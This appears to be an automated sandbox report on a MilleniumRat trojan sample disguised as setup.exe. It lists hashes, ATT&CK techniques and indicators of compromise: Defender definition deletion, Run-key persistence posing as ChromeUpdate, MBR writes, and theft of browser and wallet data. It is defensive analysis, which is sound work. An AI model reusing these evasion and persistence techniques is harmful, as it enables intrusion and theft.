milleniumrat | 61697b802f3d7906805f4563f41c6aaa5c0164dcccb6530f7997babca529bf2d

Resubmissions

19-06-2024 11:24

240619-nh8dyateqm 10

19-06-2024 10:35

240619-mmpxqatapp 10

Analysis

max time kernel
555s
max time network
557s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
19-06-2024 11:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup.exe
Size

34.0MB
MD5

e06e0cb58af7fbb8df8412cca867f8b5
SHA1

edd23b2208b48de244f1ed11f33f6e3ecc2410b1
SHA256

61697b802f3d7906805f4563f41c6aaa5c0164dcccb6530f7997babca529bf2d
SHA512

09c6ca848a8aec6a224089478c19b7e34f3157d075fe42cb2cc0cfe2413b7520b6d236ca99b9f7927de77368ee683d987d3e44fbcc09dc8b794bd32510b5b074
SSDEEP

786432:4RQBr9FRIY2ZzwwIiJmQZNKCIEHG3KSUpzxAR8smu8XRiH:4ROrbRIY2DvJmQZNKXEzpzxK83uKY

Score

10^/10

milleniumrat bootkit discovery evasion execution persistence privilege_escalation pyinstaller rat spyware stealer trojan upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Processes:

MpCmdRun.exe

pid process

1520 MpCmdRun.exe
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
rat stealer milleniumrat

pid	process
1520	MpCmdRun.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

Processes:

setup.exeupdater.exe

description	pid	process	target process
PID 3480 created 3376	3480	setup.exe	Explorer.EXE
PID 3480 created 3376	3480	setup.exe	Explorer.EXE
PID 3480 created 3376	3480	setup.exe	Explorer.EXE
PID 3480 created 3376	3480	setup.exe	Explorer.EXE
PID 3480 created 3376	3480	setup.exe	Explorer.EXE
PID 3480 created 3376	3480	setup.exe	Explorer.EXE
PID 4796 created 3376	4796	updater.exe	Explorer.EXE
PID 4796 created 3376	4796	updater.exe	Explorer.EXE
PID 4796 created 3376	4796	updater.exe	Explorer.EXE
PID 4796 created 3376	4796	updater.exe	Explorer.EXE
PID 4796 created 3376	4796	updater.exe	Explorer.EXE
PID 4796 created 3376	4796	updater.exe	Explorer.EXE

Contacts a large (4813) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4984 powershell.exe
7948 powershell.exe
6884 powershell.exe
4152 powershell.exe
2360 powershell.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
4984	powershell.exe
7948	powershell.exe
6884	powershell.exe
4152	powershell.exe
2360	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cs-16-original.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\International\Geo\Nation	cs-16-original.exe

Executes dropped EXE 18 IoCs

Processes:

Build.exehacn.exebased.exebased.exehacn.exes.exemain.exesvchost.exesetup.exesvchost.exerar.exeUpdate.exeupdater.execs-16-original.exeCounter-Strike.exehl.exeCounter-Strike.exehl.exe

pid	process
4248	Build.exe
1432	hacn.exe
1952	based.exe
2276	based.exe
816	hacn.exe
2980	s.exe
4192	main.exe
2604	svchost.exe
3480	setup.exe
5328	svchost.exe
4552	rar.exe
6800	Update.exe
4796	updater.exe
7948	cs-16-original.exe
6292	Counter-Strike.exe
6900	hl.exe
7564	Counter-Strike.exe
4128	hl.exe

Loads dropped DLL 64 IoCs

Processes:

setup.exebased.exehacn.exemain.exesvchost.exeUpdate.exehl.exe

pid	process
5068	setup.exe
5068	setup.exe
2276	based.exe
2276	based.exe
816	hacn.exe
816	hacn.exe
2276	based.exe
2276	based.exe
2276	based.exe
2276	based.exe
2276	based.exe
2276	based.exe
2276	based.exe
2276	based.exe
2276	based.exe
2276	based.exe
2276	based.exe
2276	based.exe
2276	based.exe
2276	based.exe
4192	main.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
5328	svchost.exe
6800	Update.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 53 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI30962\python310.dll	upx
behavioral1/memory/5068-20-0x00007FFB6C780000-0x00007FFB6CBE5000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI30962\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI30962\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI30962\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI30962\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI30962\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI30962\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI30962\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI30962\libcrypto-1_1.dll	upx
behavioral1/memory/2276-86-0x00007FFB6C780000-0x00007FFB6CBE5000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19522\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19522\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19522\_queue.pyd	upx
\Users\Admin\AppData\Local\Temp\_MEI19522\sqlite3.dll	upx
behavioral1/memory/2276-147-0x00007FFB701C0000-0x00007FFB701DE000-memory.dmp	upx
behavioral1/memory/2276-148-0x00007FFB70050000-0x00007FFB701BD000-memory.dmp	upx
behavioral1/memory/2276-156-0x00007FFB6A640000-0x00007FFB6A758000-memory.dmp	upx
behavioral1/memory/2276-153-0x00007FFB6B1E0000-0x00007FFB6B296000-memory.dmp	upx
behavioral1/memory/2276-152-0x00007FFB6C400000-0x00007FFB6C774000-memory.dmp	upx
behavioral1/memory/2276-151-0x00007FFB70000000-0x00007FFB7002E000-memory.dmp	upx
behavioral1/memory/2276-150-0x00007FFB702F0000-0x00007FFB702FD000-memory.dmp	upx
behavioral1/memory/2276-149-0x00007FFB70030000-0x00007FFB70049000-memory.dmp	upx
behavioral1/memory/2276-155-0x00007FFB6FFD0000-0x00007FFB6FFDD000-memory.dmp	upx
behavioral1/memory/2276-154-0x00007FFB6FFE0000-0x00007FFB6FFF5000-memory.dmp	upx
behavioral1/memory/2276-146-0x00007FFB701E0000-0x00007FFB701F9000-memory.dmp	upx
behavioral1/memory/2276-145-0x00007FFB70200000-0x00007FFB7022C000-memory.dmp	upx
behavioral1/memory/2276-144-0x00007FFB70300000-0x00007FFB7030F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19522\libssl-1_1.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI19522\libffi-7.dll	upx
behavioral1/memory/2276-112-0x00007FFB70310000-0x00007FFB70334000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\_MEI19522\_ctypes.pyd	upx
behavioral1/memory/2276-2693-0x00007FFB6C780000-0x00007FFB6CBE5000-memory.dmp	upx
behavioral1/memory/2276-2741-0x00007FFB70310000-0x00007FFB70334000-memory.dmp	upx
behavioral1/memory/2276-2788-0x00007FFB6FFD0000-0x00007FFB6FFDD000-memory.dmp	upx
behavioral1/memory/2276-2787-0x00007FFB6FFE0000-0x00007FFB6FFF5000-memory.dmp	upx
behavioral1/memory/2276-2786-0x00007FFB6B1E0000-0x00007FFB6B296000-memory.dmp	upx
behavioral1/memory/2276-2785-0x00007FFB6C400000-0x00007FFB6C774000-memory.dmp	upx
behavioral1/memory/2276-2784-0x00007FFB70000000-0x00007FFB7002E000-memory.dmp	upx
behavioral1/memory/2276-2783-0x00007FFB702F0000-0x00007FFB702FD000-memory.dmp	upx
behavioral1/memory/2276-2782-0x00007FFB70030000-0x00007FFB70049000-memory.dmp	upx
behavioral1/memory/2276-2781-0x00007FFB70050000-0x00007FFB701BD000-memory.dmp	upx
behavioral1/memory/2276-2780-0x00007FFB701C0000-0x00007FFB701DE000-memory.dmp	upx
behavioral1/memory/2276-2779-0x00007FFB701E0000-0x00007FFB701F9000-memory.dmp	upx
behavioral1/memory/2276-2778-0x00007FFB70200000-0x00007FFB7022C000-memory.dmp	upx
behavioral1/memory/2276-2777-0x00007FFB70300000-0x00007FFB7030F000-memory.dmp	upx
behavioral1/memory/2276-2776-0x00007FFB70310000-0x00007FFB70334000-memory.dmp	upx
behavioral1/memory/2276-2775-0x00007FFB6C780000-0x00007FFB6CBE5000-memory.dmp	upx
behavioral1/memory/2276-2789-0x00007FFB6A640000-0x00007FFB6A758000-memory.dmp	upx
C:\Counter-Strike-Original\Counter-Strike.exe	upx
behavioral1/memory/6292-24570-0x0000000000400000-0x0000000000439000-memory.dmp	upx
behavioral1/memory/6292-24592-0x0000000000400000-0x0000000000439000-memory.dmp	upx
behavioral1/memory/7564-26824-0x0000000000400000-0x0000000000439000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe"	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

hl.exehl.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	hl.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	hl.exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Drops desktop.ini file(s) 1 IoCs

Processes:

bcastdvr.exe

description ioc process

File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini bcastdvr.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Videos\Captures\desktop.ini	bcastdvr.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

hl.exesvchost.exehl.exe

description	ioc	process
File opened (read-only)	\??\D:	hl.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\D:	hl.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

8 raw.githubusercontent.com
9 raw.githubusercontent.com
13 raw.githubusercontent.com
62 raw.githubusercontent.com
64 discord.com
65 discord.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

5 ip-api.com
18 api.ipify.org
19 api.ipify.org
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

hl.exehl.exe

description ioc process

File opened for modification \??\PhysicalDrive0 hl.exe
File opened for modification \??\PhysicalDrive0 hl.exe

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com
13	raw.githubusercontent.com
62	raw.githubusercontent.com
64	discord.com
65	discord.com

flow	ioc
5	ip-api.com
18	api.ipify.org
19	api.ipify.org

description	ioc	process
File opened for modification	\??\PhysicalDrive0	hl.exe
File opened for modification	\??\PhysicalDrive0	hl.exe

Drops file in System32 directory 19 IoCs

Processes:

powershell.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4CaptureMonitor.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4PlaybackManager.evtx	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

svchost.exe

pid process

5328 svchost.exe

pid	process
5328	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

setup.exeupdater.exe

description	pid	process	target process
PID 3480 set thread context of 4716	3480	setup.exe	dialer.exe
PID 4796 set thread context of 6064	4796	updater.exe	dialer.exe
PID 4796 set thread context of 9176	4796	updater.exe	dialer.exe
PID 4796 set thread context of 2188	4796	updater.exe	dialer.exe

Drops file in Program Files directory 1 IoCs

Processes:

setup.exe

description ioc process

File created C:\Program Files\Google\Chrome\updater.exe setup.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	setup.exe

Drops file in Windows directory 10 IoCs

Processes:

Explorer.EXEMicrosoftEdge.exetaskmgr.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exetaskmgr.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\2717123927\1590785016.pri	Explorer.EXE
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

6140 sc.exe
1672 sc.exe
7888 sc.exe
8080 sc.exe
8148 sc.exe
9144 sc.exe
6112 sc.exe
6124 sc.exe
2592 sc.exe
7852 sc.exe

pid	process
6140	sc.exe
1672	sc.exe
7888	sc.exe
8080	sc.exe
8148	sc.exe
9144	sc.exe
6112	sc.exe
6124	sc.exe
2592	sc.exe
7852	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\ProgramData\Microsoft\hacn.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks SCSI registry key(s) 3 TTPs 10 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exeGamePanel.exetaskmgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	GamePanel.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000	GamePanel.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	GamePanel.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	GamePanel.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exeUpdate.exetaskmgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

6500 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

6844 WMIC.exe
Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

392 tasklist.exe
2252 tasklist.exe
6396 tasklist.exe

pid	process
6500	timeout.exe

pid	process
6844	WMIC.exe

pid	process
392	tasklist.exe
2252	tasklist.exe
6396	tasklist.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

820 systeminfo.exe

pid	process
820	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXERuntimeBroker.exesvchost.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\CodeIntegrity	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\86c978a7_0	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\CodeIntegrity\NextBrowserDataLogTime = 50bb409c6ec2da01	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\86c978a7_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001\|\\Device\\HarddiskVolume2\\Counter-Strike-Original\\hl.exe%b{00000000-0000-0000-0000-000000000000}"	svchost.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeOfficeClickToRun.exesvchost.exesvchost.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
